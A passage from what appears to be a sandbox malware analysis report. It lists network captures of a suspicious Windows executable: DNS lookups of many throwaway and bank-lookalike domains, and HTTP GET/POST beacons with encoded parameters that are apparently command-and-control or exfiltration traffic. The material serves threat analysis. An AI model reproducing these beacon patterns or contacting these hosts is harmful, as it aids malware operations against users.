                      Sep 3, 2024 12:48:13.979130983 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979140997 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979150057 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979202986 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.979254961 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.984735012 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.989916086 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:19.013217926 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.018368006 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.021311998 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.030272007 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:19.035161018 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.457319021 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:19.457376957 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:20.541229963 CEST4976680192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:20.546334982 CEST80497663.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:21.558264971 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.563178062 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:21.563244104 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.576808929 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:21.581717968 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:22.027498960 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:22.027549028 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:23.084621906 CEST4976780192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:23.089505911 CEST80497673.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.103504896 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.182163954 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.182257891 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.193367004 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:24.198189974 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198292971 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198304892 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198396921 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198404074 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198410988 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198419094 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198436022 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:24.198450089 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385535002 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385711908 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.385797977 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.385917902 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:25.386236906 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.709758043 CEST4976880192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:25.716099977 CEST80497683.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:26.728446007 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.733407021 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:26.737345934 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.749244928 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:26.754097939 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189043999 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189202070 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:27.189306974 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:27.192174911 CEST4976980192.168.2.43.33.130.190
                      Sep 3, 2024 12:48:27.196954966 CEST80497693.33.130.190192.168.2.4
                      Sep 3, 2024 12:48:32.792277098 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:32.797261000 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:32.797367096 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:32.814332008 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.115880966 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.164175987 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.164189100 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766237974 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766331911 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766376972 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:33.766406059 CEST8049770218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:33.766448975 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:34.319128990 CEST4977080192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.338299990 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.345196009 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:35.345388889 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.355160952 CEST4977180192.168.2.4218.247.68.184
                      Sep 3, 2024 12:48:35.361105919 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350646019 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350668907 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350677967 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350682020 CEST8049771218.247.68.184192.168.2.4
                      Sep 3, 2024 12:48:36.350755930 CEST4977180192.168.2.4218.247.68.184

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 3, 2024 12:46:02.973001003 CEST5433953192.168.2.41.1.1.1
                      Sep 3, 2024 12:46:03.273441076 CEST53543391.1.1.1192.168.2.4
                      Sep 3, 2024 12:46:18.822684050 CEST6173653192.168.2.41.1.1.1
                      Sep 3, 2024 12:46:19.134821892 CEST53617361.1.1.1192.168.2.4
                      Sep 3, 2024 12:46:32.259215117 CEST6154853192.168.2.41.1.1.1
                      Sep 3, 2024 12:46:32.696712017 CEST53615481.1.1.1192.168.2.4
                      Sep 3, 2024 12:46:46.463182926 CEST6170353192.168.2.41.1.1.1
                      Sep 3, 2024 12:46:59.981013060 CEST5476853192.168.2.41.1.1.1
                      Sep 3, 2024 12:47:00.013551950 CEST53547681.1.1.1192.168.2.4
                      Sep 3, 2024 12:47:13.448673964 CEST5660953192.168.2.41.1.1.1
                      Sep 3, 2024 12:47:13.659240961 CEST53566091.1.1.1192.168.2.4
                      Sep 3, 2024 12:47:26.795118093 CEST5750953192.168.2.41.1.1.1
                      Sep 3, 2024 12:47:26.805310965 CEST53575091.1.1.1192.168.2.4
                      Sep 3, 2024 12:47:34.870033026 CEST5154553192.168.2.41.1.1.1
                      Sep 3, 2024 12:47:34.928621054 CEST53515451.1.1.1192.168.2.4
                      Sep 3, 2024 12:47:57.386573076 CEST5500953192.168.2.41.1.1.1
                      Sep 3, 2024 12:47:57.401392937 CEST53550091.1.1.1192.168.2.4
                      Sep 3, 2024 12:48:05.465250015 CEST6140453192.168.2.41.1.1.1
                      Sep 3, 2024 12:48:05.513112068 CEST53614041.1.1.1192.168.2.4
                      Sep 3, 2024 12:48:18.997231007 CEST5298353192.168.2.41.1.1.1
                      Sep 3, 2024 12:48:19.006894112 CEST53529831.1.1.1192.168.2.4
                      Sep 3, 2024 12:48:32.197731972 CEST6128753192.168.2.41.1.1.1
                      Sep 3, 2024 12:48:32.770678997 CEST53612871.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 3, 2024 12:46:02.973001003 CEST192.168.2.41.1.1.10x34e9Standard query (0)www.clientebradesco.onlineA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:18.822684050 CEST192.168.2.41.1.1.10x41a6Standard query (0)www.myim.cloudA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:32.259215117 CEST192.168.2.41.1.1.10xcce2Standard query (0)www.d55dg.topA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:46.463182926 CEST192.168.2.41.1.1.10x426aStandard query (0)www.arlon-commerce.comA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:59.981013060 CEST192.168.2.41.1.1.10x9e80Standard query (0)www.fineg.onlineA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:13.448673964 CEST192.168.2.41.1.1.10xe892Standard query (0)www.asian-massage-us.xyzA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:26.795118093 CEST192.168.2.41.1.1.10x930Standard query (0)www.thriveline.onlineA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:34.870033026 CEST192.168.2.41.1.1.10xa0f5Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:57.386573076 CEST192.168.2.41.1.1.10x46e0Standard query (0)www.esistiliya.onlineA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:05.465250015 CEST192.168.2.41.1.1.10x59bcStandard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:18.997231007 CEST192.168.2.41.1.1.10x6806Standard query (0)www.omexai.infoA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:32.197731972 CEST192.168.2.41.1.1.10x73bcStandard query (0)www.dfbio.netA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.33.2.79A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.33.30.197A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.56.79.23A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online96.126.123.244A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online72.14.185.43A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online198.58.118.167A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.79.19.196A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online72.14.178.174A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online173.255.194.134A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.33.20.235A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.33.23.183A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:03.273441076 CEST1.1.1.1192.168.2.40x34e9No error (0)www.clientebradesco.online45.33.18.44A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:19.134821892 CEST1.1.1.1192.168.2.40x41a6No error (0)www.myim.cloud199.59.243.226A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:32.696712017 CEST1.1.1.1192.168.2.40xcce2No error (0)www.d55dg.topd55dg.topCNAME (Canonical name)IN (0x0001)false
                      Sep 3, 2024 12:46:32.696712017 CEST1.1.1.1192.168.2.40xcce2No error (0)d55dg.top154.23.184.240A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:46:46.680761099 CEST1.1.1.1192.168.2.40x426aNo error (0)www.arlon-commerce.comwhois-unverified.domainbox.akadns.netCNAME (Canonical name)IN (0x0001)false
                      Sep 3, 2024 12:47:00.013551950 CEST1.1.1.1192.168.2.40x9e80No error (0)www.fineg.online162.0.239.141A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:13.659240961 CEST1.1.1.1192.168.2.40xe892No error (0)www.asian-massage-us.xyz199.59.243.226A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:26.805310965 CEST1.1.1.1192.168.2.40x930Server failure (2)www.thriveline.onlinenonenoneA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:34.928621054 CEST1.1.1.1192.168.2.40xa0f5No error (0)www.aflaksokna.comaflaksokna.comCNAME (Canonical name)IN (0x0001)false
                      Sep 3, 2024 12:47:34.928621054 CEST1.1.1.1192.168.2.40xa0f5No error (0)aflaksokna.com5.144.130.52A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:47:57.401392937 CEST1.1.1.1192.168.2.40x46e0Name error (3)www.esistiliya.onlinenonenoneA (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:05.513112068 CEST1.1.1.1192.168.2.40x59bcNo error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:19.006894112 CEST1.1.1.1192.168.2.40x6806No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
                      Sep 3, 2024 12:48:19.006894112 CEST1.1.1.1192.168.2.40x6806No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:19.006894112 CEST1.1.1.1192.168.2.40x6806No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
                      Sep 3, 2024 12:48:32.770678997 CEST1.1.1.1192.168.2.40x73bcNo error (0)www.dfbio.net218.247.68.184A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.clientebradesco.online
                      • www.myim.cloud
                      • www.d55dg.top
                      • www.fineg.online
                      • www.asian-massage-us.xyz
                      • www.aflaksokna.com
                      • www.qiluqiyuan.buzz
                      • www.omexai.info
                      • www.dfbio.net

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973645.33.2.79801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:03.294533014 CEST462OUTGET /xsf1/?3L7=cfJLLBshpRPDzp&TJY8=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.clientebradesco.online
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:03.778975964 CEST1236INHTTP/1.1 200 OK
                      server: openresty/1.13.6.1
                      date: Tue, 03 Sep 2024 10:46:03 GMT
                      content-type: text/html
                      transfer-encoding: chunked
                      connection: close
                      Data Raw: 34 38 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED]
                      Data Ascii: 481<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725360363.0067147854&other_args=eyJ1cmkiOiAiL3hzZjEiLCAiYXJncyI6ICIzTDc9Y2ZKTExCc2hwUlBEenAmVEpZOD0vMmR4T0NyOWU4VHU0N1ZyRHRwU2VYMTBuUHRTZzNwRHRKRXQzYzJGb3o1ZnB6ZW9SSXVqQlZqckRNc0tIYzcwKzBLOWlWS0E3dkU5WkZDaU01T2FGVHNlYW1CNTBaMzlFMUdzWEswYno5U1U4NFB5V3JHdEVlZz0iLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlv [TRUNCATED]
                      Sep 3, 2024 12:46:03.779367924 CEST85INData Raw: 64 32 56 69 63 43 77 71 4c 79 6f 37 63 54 30 77 4c 6a 67 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d
                      Data Ascii: d2VicCwqLyo7cT0wLjgifQ=="; } </script> </body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449737199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:19.152934074 CEST708OUTPOST /12ts/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.myim.cloud
                      Origin: http://www.myim.cloud
                      Referer: http://www.myim.cloud/12ts/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d
                      Data Ascii: TJY8=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
                      Sep 3, 2024 12:46:19.589030027 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:18 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1106
                      x-request-id: dc0cc2cc-126b-4511-8e7e-1ce8ae09bf74
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                      set-cookie: parking_session=dc0cc2cc-126b-4511-8e7e-1ce8ae09bf74; expires=Tue, 03 Sep 2024 11:01:19 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:19.589055061 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMwY2MyY2MtMTI2Yi00NTExLThlN2UtMWNlOGFlMDliZjc0IiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449738199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:21.696630001 CEST728OUTPOST /12ts/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.myim.cloud
                      Origin: http://www.myim.cloud
                      Referer: http://www.myim.cloud/12ts/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 59 6a 45 57 6f 46 41 36 63 55 55 32 38 52 37 34 30 44 32 30 68 7a 36 30 48 66 73 30 35 38 68 2b 63 6f 7a 48 6f 65 69 6e 4f 6a 42 4a 5a 6b 70 4b 6f 4b 4a 4b 65 69 77 77 6e 31 6f 44 68 32 35 51 78 70 49 35 34 42 4e 73 42 31 63 78 51 69 30 44 56 6f 77 56 6b 52 42 68 76 49 71 51 4a 77 67 50 62 6b 66 37 39 58 4f 4f 6c 53 79 69 6b 6f 52 75 56 67 55 64 6c 36 56 79 61 66 78 74 4f 6d 69 4a 72 64 7a 71 53 76 64 36 54 38 7a 61 53 77 30 6f 34 63 44 41 34 51 74 55 6c 66 66 34 58 77 59 6f 44 6c 37 32 70 54 62 31 6c 4d 54 45 59 3d
                      Data Ascii: TJY8=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtYjEWoFA6cUU28R740D20hz60Hfs058h+cozHoeinOjBJZkpKoKJKeiwwn1oDh25QxpI54BNsB1cxQi0DVowVkRBhvIqQJwgPbkf79XOOlSyikoRuVgUdl6VyafxtOmiJrdzqSvd6T8zaSw0o4cDA4QtUlff4XwYoDl72pTb1lMTEY=
                      Sep 3, 2024 12:46:22.131633997 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:22 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1106
                      x-request-id: 2c514f73-9f09-4b90-b979-bb65a751e16b
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                      set-cookie: parking_session=2c514f73-9f09-4b90-b979-bb65a751e16b; expires=Tue, 03 Sep 2024 11:01:22 GMT; path=/
                      connection: close
